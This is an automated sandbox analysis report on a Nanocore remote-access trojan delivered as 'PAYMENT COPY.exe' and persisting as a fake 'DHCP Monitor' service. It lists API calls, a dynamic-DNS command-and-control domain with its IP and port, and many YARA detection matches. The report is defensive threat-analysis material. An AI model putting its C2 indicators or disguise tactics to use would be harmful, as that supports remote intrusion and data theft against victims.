    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_00405A15
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_004065C1 FindFirstFileA,FindClose,10_2_004065C1
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 10_2_004027A1 FindFirstFileA,10_2_004027A1
    Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 15_2_00404A29 FindFirstFileExW,15_2_00404A29

    Networking:

    barindex
    C2 URLs / IPs found in malware configurationShow sources
    Source: Malware configuration extractorURLs: chinomso.duckdns.org
    Uses dynamic DNS servicesShow sources
    Source: unknownDNS query: name: chinomso.duckdns.org
    Source: global trafficTCP traffic: 192.168.2.7:49711 -> 185.150.24.55:7688
    Source: Joe Sandbox ViewIP Address: 185.150.24.55 185.150.24.55
    Source: Joe Sandbox ViewASN Name: SKYLINKNL SKYLINKNL
    Source: unknownDNS traffic detected: queries for: chinomso.duckdns.org
    Source: PAYMENT COPY.exe, 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmpString found in binary or memory: http://google.com
    Source: dhcpmon.exe, dhcpmon.exe, 0000000A.00000002.497269393.000000000040A000.00000004.00020000.sdmp, dhcpmon.exe, 0000000E.00000000.270226951.000000000040A000.00000008.00020000.sdmp, dhcpmon.exe, 0000000F.00000000.273721399.000000000040A000.00000008.00020000.sdmp, PAYMENT COPY.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: PAYMENT COPY.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: C:\Users\user\Desktop\PAYMENT COPY.exeCode function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004054B2
    Source: PAYMENT COPY.exe, 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

    E-Banking Fraud:

    barindex
    Yara detected Nanocore RATShow sources
    Source: Yara matchFile source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.505736368.000000000341C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278355916.0000000002411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.501309782.0000000002391000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000F.00000002.298587099.0000000002291000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORY
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.3430821.25.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.342c1f8.24.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3497815.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.34931ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.348e3b6.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a61458.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a80000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.47b0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.2.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3317815.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 0.2.PAYMENT COPY.exe.2a91458.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.1.PAYMENT COPY.exe.415058.0.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.330e3b6.7.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.33131ec.8.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.7eae40.2.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.3295530.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.415058.1.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.48f0000.9.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.49c0000.10.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 14.2.dhcpmon.exe.2a50000.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 1.1.PAYMENT COPY.exe.415058.1.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 15.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a60000.5.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 7.2.PAYMENT COPY.exe.2a71458.6.raw.unpack, type: UNPACKEDPE
    Source: Yara matchFile source: 8.2.PAYMENT COPY.exe.3415530.5.unpack, type: UNPACKEDPE

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.498580778.0000000000599000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000002.500337236.0000000000730000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.499927530.00000000006C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.500528462.0000000000780000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.500087557.00000000006E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000008.00000002.278420831.0000000002460000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000F.00000002.298632979.00000000022E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000002.298228465.000000000054A000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000F.00000002.298702640.00000000032CC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000008.00000002.278034704.00000000007CE000.00000004.00000020.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000002.278506705.000000000344C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000008.00000002.278466609.0000000003411000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000008.00000002.277405850.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000001.237862989.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000002.298677896.0000000003291000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000002.500417911.0000000000750000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.501562443.0000000002404000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000002.298074708.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000008.00000002.279255629.00000000049C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000008.00000002.279026119.00000000048F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000007.00000002.264472405.0000000002A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000002.499796910.00000000006B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.500251784.0000000000710000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000002.299582604.00000000047B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000002.300040048.0000000004E32000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000008.00000001.257730823.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000000.00000002.242328677.0000000002A80000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000002.499394347.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.500213366.0000000000700000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.500144000.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.497023091.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000002.499506090.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000F.00000001.281117600.0000000000414000.00000040.00020000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0000000E.00000002.286656662.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000002.499715879.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.504422573.00000000027A5000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000003.401079389.0000000003861000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6712, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6432, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: dhcpmon.exe PID: 2896, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6612, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: PAYMENT COPY.exe PID: 6392, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: dhcpmon.exe PID: 5932, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.780000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.27b2a64.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.700000.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.47b0000.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.3430821.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.565f58.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.750000.14.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.4e30000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.37b0e8f.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.243cc68.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.2.dhcpmon.exe.565f58.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.342c1f8.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0.2.PAYMENT COPY.exe.2a80000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.5b2488.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.1.PAYMENT COPY.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 14.2.dhcpmon.exe.2a50000.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 8.1.PAYMENT COPY.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 15.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.342c1f8.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.6f0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 14.2.dhcpmon.exe.2a61458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 0.2.PAYMENT COPY.exe.2a91458.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.24228c4.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.24228c4.18.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.680000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.2436f00.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.2436f00.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.PAYMENT COPY.exe.365ec98.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.PAYMENT COPY.exe.27a65e4.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
